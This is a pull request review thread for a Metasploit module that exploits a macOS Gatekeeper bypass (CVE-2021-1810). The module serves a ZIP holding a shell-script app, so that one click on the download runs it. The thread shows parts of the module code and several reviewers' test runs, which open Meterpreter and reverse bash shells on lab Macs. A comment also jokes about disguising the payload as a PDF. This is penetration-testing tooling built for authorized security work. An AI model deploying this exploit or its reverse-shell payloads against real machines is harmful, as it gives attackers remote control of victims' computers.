### PR TITLE
add macOS gatekeeper bypass exploit

### PR DESCRIPTION
**Pull request by timwr**
This adds a module to exploit a simple gatekeeper bypass. On Safari the user must click once on the app that is automatically downloaded. On Chrome the user must click on the zip to unzip it, and again on the application to launch it.
https://objective-see.com/blog/blog_0x64.html

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/osx/browser/osx_gatekeeper_bypass`
- [ ] `exploit`
- [ ] Visit the site on a vulnerable version of OSX
- [ ] Click once on the downloaded file
- [ ] **Verify** you get a session
- [ ] **Document** add documentation

### CODE REVIEW

**Comment by h00die** [comment]
macos 11.2.3, safari 14.0.3, worked first try. used the default options for everything but verbose.

```
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://0.0.0.0:8080/gUwJmWF8RwB8slo
[*] Local IP: http://2.2.2.2:8080/gUwJmWF8RwB8slo
[*] Server started.
[*] 3.3.3.3     osx_gatekeeper_bypass - Request /gUwJmWF8RwB8slo from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
[+] 3.3.3.3     osx_gatekeeper_bypass - macOS version 10.15.6 is vulnerable
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (810096 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 3.3.3.3:49633) at 2021-04-26 19:29:41 -0400

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions -i 1
[*] Starting interaction with 1...


meterpreter > getuid
Server username: h00die @ h00dies-MBP.nodomain (uid=501, gid=20, euid=501, egid=20)
meterpreter > sysinfo
Computer     : h00dies-MBP.nodomain
OS           :  (macOS 11.2.3)
Architecture : x64
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
```

**Comment by wvu-r7** [comment]
Custom icon left as an exercise for the user? It's possible to store a resource fork in a ZIP.

**Comment by wvu-r7** [comment]
[Totally Legit PDF.zip](https://github.com/rapid7/metasploit-framework/files/6386473/Totally.Legit.PDF.zip)

File: modules/exploits/osx/browser/osx_gatekeeper_bypass.rb [hunk 1]
```diff
@@ -0,0 +1,106 @@
...
+      elsif mac_osx_version < Rex::Version.new('10.15.5')
+        print_warning "macOS version #{mac_osx_version} is not vulnerable"
+      else
+        print_good "macOS version #{mac_osx_version} is vulnerable"
+        return true
+      end
+    else
+      print_warning 'Unexpected User-Agent'
+    end
+    return false
```
Comment (wvu-r7) [inline modules/exploits/osx/browser/osx_gatekeeper_bypass.rb:67]: Can this be refactored?

https://github.com/rubocop/ruby-style-guide#nested-conditionals

Comment (timwr) [reply modules/exploits/osx/browser/osx_gatekeeper_bypass.rb]: Good idea, thanks!

File: modules/exploits/osx/browser/osx_gatekeeper_bypass.rb [hunk 2]
```diff
@@ -0,0 +1,105 @@
...
+        },
+        'License' => MSF_LICENSE,
+        'Targets' => [
+          [ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
+          [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2021-03-25',
+        'Author' => [ 'Cedric Owens' ],
```
Comment (wvu-r7) [inline modules/exploits/osx/browser/osx_gatekeeper_bypass.rb:33]:
```suggestion
        'Author' => [
          'Cedric Owens', # Discovery
          'timwr' # Module
        ],
```

File: modules/exploits/osx/browser/osx_gatekeeper_bypass.rb [hunk 3]
```diff
@@ -0,0 +1,105 @@
...
+        'Notes' =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS ]
```
Comment (wvu-r7) [inline modules/exploits/osx/browser/osx_gatekeeper_bypass.rb:37]:
```suggestion
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
```

File: modules/exploits/osx/browser/osx_gatekeeper_bypass.rb [hunk 4]
```diff
@@ -0,0 +1,105 @@
...
+        },
+        'References' => [
+          ['CVE', '2021-1810'],
```
Comment (wvu-r7) [inline modules/exploits/osx/browser/osx_gatekeeper_bypass.rb:40]: https://twitter.com/pajp/status/1386902958982549505

**Comment by space-r7** [comment]
Tested on MacOS `10.15.6`:

Downloaded from Safari:

```
msf6 > use exploit/osx/browser/osx_gatekeeper_bypass 
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set srvhost 192.168.37.1
srvhost => 192.168.37.1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > options

Module options (exploit/osx/browser/osx_gatekeeper_bypass):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   APP_NAME  app              no        The application name (Default: app)
   SRVHOST   192.168.37.1     yes       The local host or network interface to listen on. This must be an a
                                        ddress on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


Payload options (osx/x64/meterpreter/reverse_tcp):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   LHOST                  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT                  4444             yes       The listen port
   MeterpreterDebugLevel  0                yes       Set debug level for meterpreter 0-3 (Default output is
                                                      strerr)


Exploit target:

   Id  Name
   --  ----
   0   macOS x64 (Native Payload)


msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.37.1:4444 
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > [*] Using URL: http://192.168.37.1:8080/q670M8fEMu
[*] Server started.
[*] 192.168.37.132   osx_gatekeeper_bypass - Request /q670M8fEMu from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
[+] 192.168.37.132   osx_gatekeeper_bypass - macOS version 10.15.6 is vulnerable
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (810096 bytes) to 192.168.37.132
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.132:49380) at 2021-04-29 15:21:38 -0500

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions

Active sessions
===============

  Id  Name  Type                 Information                           Connection
  --  ----  ----                 -----------                           ----------
  1         meterpreter x64/osx  space @ spaces-Mac.local (uid=501, g  192.168.37.1:4444 -> 192.168.37.132:
                                 id=20, euid=501, egid=20) @ spaces-M  49380 (192.168.37.132)
                                 ac.local

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: space @ spaces-Mac.local (uid=501, gid=20, euid=501, egid=20)
meterpreter > sysinfo
Computer     : spaces-Mac.local
OS           : macOS Catalina (macOS 10.15.6)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
```

Downloaded from Chrome:

```
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Using URL: http://192.168.37.1:8080/h11OKvU8pjB
[*] Server started.
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > [*] 192.168.37.132   osx_gatekeeper_bypass - Request /h11OKvU8pjB from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
[+] 192.168.37.132   osx_gatekeeper_bypass - macOS version 10.15.6 is vulnerable
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (810096 bytes) to 192.168.37.132
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.132:49429) at 2021-04-29 16:12:50 -0500

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: space @ spaces-Mac.local (uid=501, gid=20, euid=501, egid=20)
meterpreter > sysinfo
Computer     : spaces-Mac.local
OS           : macOS Catalina (macOS 10.15.6)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
meterpreter >
```

**Review by wvu — CHANGES_REQUESTED** [review]
A few important changes to make to the metadata. I don't think @timwr or I will get to adding icon support in this PR. It's nice to have but not necessary to merge.

**Comment by space-r7** [comment]
Not sure if this is some bug / feature of Archive Utility, but extracting the zip with that results in the `app`  being a directory instead of a file:

```
spaces-Mac:Downloads space$ ls -alR app.app
total 0
drwxrwxr-x@ 3 space  staff   96 May  4 15:47 .
drwx------@ 6 space  staff  192 May  4 15:48 ..
drwxrwxr-x@ 3 space  staff   96 May  4 15:47 Contents

app.app/Contents:
total 0
drwxrwxr-x@ 3 space  staff  96 May  4 15:47 .
drwxrwxr-x@ 3 space  staff  96 May  4 15:47 ..
drwxrwxr-x@ 3 space  staff  96 May  4 15:47 MacOS

app.app/Contents/MacOS:
total 0
drwxrwxr-x@ 3 space  staff  96 May  4 15:47 .
drwxrwxr-x@ 3 space  staff  96 May  4 15:47 ..
drwxrwxr-x@ 2 space  staff  64 May  4 15:47 app

app.app/Contents/MacOS/app:
total 0
drwxrwxr-x@ 2 space  staff  64 May  4 15:47 .
drwxrwxr-x@ 3 space  staff  96 May  4 15:47 ..
```

Here's a screenshot of what happens after clicking on the extracted app after downloading from Chrome.

image

**Review by wvu — APPROVED** [review]

File: modules/exploits/osx/browser/osx_gatekeeper_bypass.rb [hunk 5]
```diff
@@ -0,0 +1,108 @@
...
+      #!/bin/sh
+
+      #{command}
+    SCRIPT
+
+    zip = Rex::Zip::Archive.new
+    zip.add_file("#{app_name}.app/", '')
+    zip.add_file("#{app_name}.app/Contents/", '')
+    zip.add_file("#{app_name}.app/Contents/MacOS/", '')
+    zip.add_file("#{app_name}.app/Contents/MacOS/#{app_name}", shell_script).last.attrs = 0x10
```
Comment (space-r7) [inline modules/exploits/osx/browser/osx_gatekeeper_bypass.rb:105]: Tried the exploit with this permissions change, and it works for both Safari and Chrome, even while using the Archive Utility. Still not sure why `unzip` works yet Archive Utility doesn't.

```suggestion
    zip.add_file("#{app_name}.app/Contents/MacOS/#{app_name}", shell_script).last.attrs = 0o777
```

Comment (timwr) [reply modules/exploits/osx/browser/osx_gatekeeper_bypass.rb]: Well spotted! Thanks. I confirmed msfvenom -f osx-app still works as expected

**Comment by space-r7** [comment]
Tested the other targets:

<details>
<summary>Python</summary>

```
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Using URL: http://192.168.37.1:8080/eN41blUd5KgRq
[*] Server started.
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > [*] 192.168.37.136   osx_gatekeeper_bypass - Request /eN41blUd5KgRq from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
[+] 192.168.37.136   osx_gatekeeper_bypass - macOS version 10.15.6 is vulnerable
[*] Sending stage (39336 bytes) to 192.168.37.136
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.136:49210) at 2021-05-07 08:57:05 -0500

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: space
meterpreter > sysinfo
Computer     : spaces-Mac.local
OS           : Darwin 19.6.0 Darwin Kernel Version 19.6.0: Thu Jun 18 20:49:00 PDT 2020; root:xnu-6153.141.1~1/RELEASE_X86_64
Architecture : x64
Meterpreter  : python/osx
```

</details>

<details>
<summary>CMD</summary>

```
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.37.1:4444 
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > [*] Using URL: http://192.168.37.1:8080/8mFx2Eulk8x62s
[*] Server started.
[*] 192.168.37.136   osx_gatekeeper_bypass - Request /8mFx2Eulk8x62s from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
[+] 192.168.37.136   osx_gatekeeper_bypass - macOS version 10.15.6 is vulnerable
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49212) at 2021-05-07 09:06:23 -0500

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions -i 1
[*] Starting interaction with 1...

id
uid=501(space) gid=20(staff) groups=20(staff),701(com.apple.sharepoint.group.1),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
uname -a
Darwin spaces-Mac.local 19.6.0 Darwin Kernel Version 19.6.0: Thu Jun 18 20:49:00 PDT 2020; root:xnu-6153.141.1~1/RELEASE_X86_64 x86_64
^C
Abort session 1? [y/N]  y
```
</details>

**Pull request merged**